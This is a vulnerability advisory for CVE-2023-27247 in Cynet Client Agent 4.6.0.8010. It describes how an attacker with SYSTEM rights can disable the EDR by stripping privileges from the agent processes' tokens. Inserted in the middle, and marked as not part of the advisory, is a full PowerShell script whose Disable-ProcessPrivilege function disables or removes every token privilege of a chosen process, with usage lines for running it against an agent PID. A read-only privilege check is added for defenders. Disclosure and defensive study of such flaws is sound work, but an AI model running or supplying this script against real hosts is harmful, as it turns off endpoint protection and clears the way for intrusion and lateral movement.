Headline
CVE-2023-27247 (NF-Security-Team/CVEs, CVEs/Readme.md at main)
An issue in Cynet Client Agent v4.6.0.8010 allows an attacker with Administrator rights to disable the EDR functions by disabling the privileges in the agent processes' tokens.
Coordinated Disclosure Timeline
22/12/2022: Report submitted to the vendor by direct email to Research & Development
19/01/2023: Vendor acknowledged the vulnerability and was notified of my intention to publish the advisory
26/02/2023: CVE submission sent to MITRE.org
Executive Summary
An issue found in Cynet Client Agent version 4.6.0.8010 allows an attacker who holds local Administrator or System privileges on the attacked machine to completely disable the Cynet protection modules.
Technical Summary
To exploit the vulnerability an attacker must first obtain System rights on the machine (reachable from a local Administrator account) and then use a tool such as Process Hacker that can disable or remove privileges in the token of a running process. Applied to the agent's processes, this stops the EDR from functioning.
IMPORTANT: although this is a local issue that already requires elevated rights, it removes the EDR's visibility and blocking: once the agent is disabled, an attacker can collect information useful for further privilege escalation, and after a successful attack lateral movement can be carried out in several ways without interference.
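The procedure above, as an added example that is not part of this advisory or of Cynet's software: the Win32 calls behind what a tool like Process Hacker does when you disable a process's privileges (open the process, open its token with TOKEN_ADJUST_PRIVILEGES, rewrite the LUID_AND_ATTRIBUTES entries, call AdjustTokenPrivileges), plus a read-only listing a defender can run to confirm an agent still holds its privileges. The function names, the PID parameter and the PsExec note are my assumptions; the page names no agent process, so the PID is yours to supply. Run it from a SYSTEM shell (the advisory's precondition) on a lab host only, because stripping a live agent's privileges is destructive.

```powershell
# Added example (not code from the advisory or from Cynet). Reproduces the generic
# token-privilege manipulation described in the Technical Summary and adds a check
# that lists a process's privileges. PID and function names are assumptions.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class TokenOps {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct LUID_AND_ATTRIBUTES { public LUID Luid; public uint Attributes; }
    public const int  TokenPrivileges = 3;                 // TOKEN_INFORMATION_CLASS value
    public const uint TOKEN_QUERY = 0x0008, TOKEN_ADJUST_PRIVILEGES = 0x0020;
    public const uint PROCESS_QUERY_INFORMATION = 0x0400;
    public const uint SE_PRIVILEGE_ENABLED = 0x2, SE_PRIVILEGE_REMOVED = 0x4;
    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool GetTokenInformation(IntPtr token, int cls, IntPtr buf, int len, out int needed);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, IntPtr newState, int len, IntPtr prev, IntPtr prevLen);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool LookupPrivilegeName(string sys, ref LUID luid, System.Text.StringBuilder name, ref int len);
}
"@

# Open a PID's token and copy its TOKEN_PRIVILEGES block into unmanaged memory.
# Layout: DWORD PrivilegeCount, then Count x 12-byte LUID_AND_ATTRIBUTES. Caller frees both handles.
function Open-TokenPrivileges {
    param([int]$ProcessId, [uint32]$TokenAccess)
    $proc = [TokenOps]::OpenProcess([TokenOps]::PROCESS_QUERY_INFORMATION, $false, $ProcessId)
    if ($proc -eq [IntPtr]::Zero) {
        # Error 5 (ACCESS_DENIED) here means the caller lacks SeDebugPrivilege or the target
        # is a protected process (PPL), which is the standard defence against this tampering.
        throw "OpenProcess($ProcessId) failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    $token = [IntPtr]::Zero
    $ok = [TokenOps]::OpenProcessToken($proc, $TokenAccess, [ref]$token)
    [void][TokenOps]::CloseHandle($proc)
    if (-not $ok) { throw "OpenProcessToken failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    $needed = 0   # first call only reports the required size
    [void][TokenOps]::GetTokenInformation($token, [TokenOps]::TokenPrivileges, [IntPtr]::Zero, 0, [ref]$needed)
    $buf = [Runtime.InteropServices.Marshal]::AllocHGlobal($needed)
    if (-not [TokenOps]::GetTokenInformation($token, [TokenOps]::TokenPrivileges, $buf, $needed, [ref]$needed)) {
        [Runtime.InteropServices.Marshal]::FreeHGlobal($buf); [void][TokenOps]::CloseHandle($token)
        throw "GetTokenInformation failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    [pscustomobject]@{ Token = $token; Buffer = $buf; Length = $needed
                       Count = [Runtime.InteropServices.Marshal]::ReadInt32($buf) }
}

# Defender-side check: list each privilege in the process token and whether it is enabled.
function Get-ProcessPrivilege {
    param([Parameter(Mandatory)][int]$ProcessId)
    $t = Open-TokenPrivileges -ProcessId $ProcessId -TokenAccess ([TokenOps]::TOKEN_QUERY)
    try {
        $size = [Runtime.InteropServices.Marshal]::SizeOf([type][TokenOps+LUID_AND_ATTRIBUTES])   # 12 bytes
        for ($i = 0; $i -lt $t.Count; $i++) {
            $entry = [IntPtr]($t.Buffer.ToInt64() + 4 + $i * $size)   # skip the PrivilegeCount DWORD
            $la = [Runtime.InteropServices.Marshal]::PtrToStructure($entry, [type][TokenOps+LUID_AND_ATTRIBUTES])
            $luid = $la.Luid; $name = New-Object System.Text.StringBuilder 256; $len = 256
            [void][TokenOps]::LookupPrivilegeName($null, [ref]$luid, $name, [ref]$len)
            [pscustomobject]@{ ProcessId = $ProcessId; Privilege = $name.ToString()
                               Enabled = (($la.Attributes -band [TokenOps]::SE_PRIVILEGE_ENABLED) -ne 0) }
        }
    } finally { [Runtime.InteropServices.Marshal]::FreeHGlobal($t.Buffer); [void][TokenOps]::CloseHandle($t.Token) }
}

# Attacker-side step the advisory describes: set every entry's Attributes to 0 (disabled) or to
# SE_PRIVILEGE_REMOVED (stripped for good) and push the block back with AdjustTokenPrivileges.
function Disable-ProcessPrivilege {
    param([Parameter(Mandatory)][int]$ProcessId, [switch]$Remove)
    $access = [TokenOps]::TOKEN_QUERY -bor [TokenOps]::TOKEN_ADJUST_PRIVILEGES
    $t = Open-TokenPrivileges -ProcessId $ProcessId -TokenAccess $access
    try {
        $attr = if ($Remove) { [TokenOps]::SE_PRIVILEGE_REMOVED } else { 0 }
        for ($i = 0; $i -lt $t.Count; $i++) {
            # Attributes sits 8 bytes after the LUID inside each 12-byte entry
            [Runtime.InteropServices.Marshal]::WriteInt32([IntPtr]($t.Buffer.ToInt64() + 4 + $i * 12 + 8), [int]$attr)
        }
        if (-not [TokenOps]::AdjustTokenPrivileges($t.Token, $false, $t.Buffer, $t.Length, [IntPtr]::Zero, [IntPtr]::Zero)) {
            throw "AdjustTokenPrivileges failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
        }
        # The call returns TRUE even when some entries were not adjusted; last error 1300
        # (ERROR_NOT_ALL_ASSIGNED) flags that case, so report $true only on a clean success.
        [Runtime.InteropServices.Marshal]::GetLastWin32Error() -eq 0
    } finally { [Runtime.InteropServices.Marshal]::FreeHGlobal($t.Buffer); [void][TokenOps]::CloseHandle($t.Token) }
}

# Usage from a SYSTEM shell (for example one started with PsExec -s; PID values are yours):
#   Get-ProcessPrivilege -ProcessId <pid> | Format-Table          # baseline listing
#   Disable-ProcessPrivilege -ProcessId <pid>                     # disable all privileges
#   Get-ProcessPrivilege -ProcessId <pid> | Where-Object Enabled  # confirm nothing remains enabled
```

The listing function is the part worth keeping on a defender's side: a scheduled comparison of an agent's token privileges against a known-good baseline turns this tampering into a detectable event, and an OpenProcess failure with error 5 is the expected result against an agent that runs as a protected process.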
Product
Cynet Client Agent
Tested Version
Version 4.6.0.8010
Details
Issue: full disablement of the anti-malware protection components
System privileges obtained through a local Administrator account allow the whole set of EDR protection capabilities to be disabled seamlessly by disabling the privileges in the agent processes' tokens.
Impact
EDR protection fully disabled on the system
CVE
CVE-2023-27247
Credit
This issue was discovered and reported by Nicolas Fasolo (@Err0r0x41414141)
Contact
You can contact me at [email protected]; please include a reference to CVE-2023-27247 in any communication regarding this topic.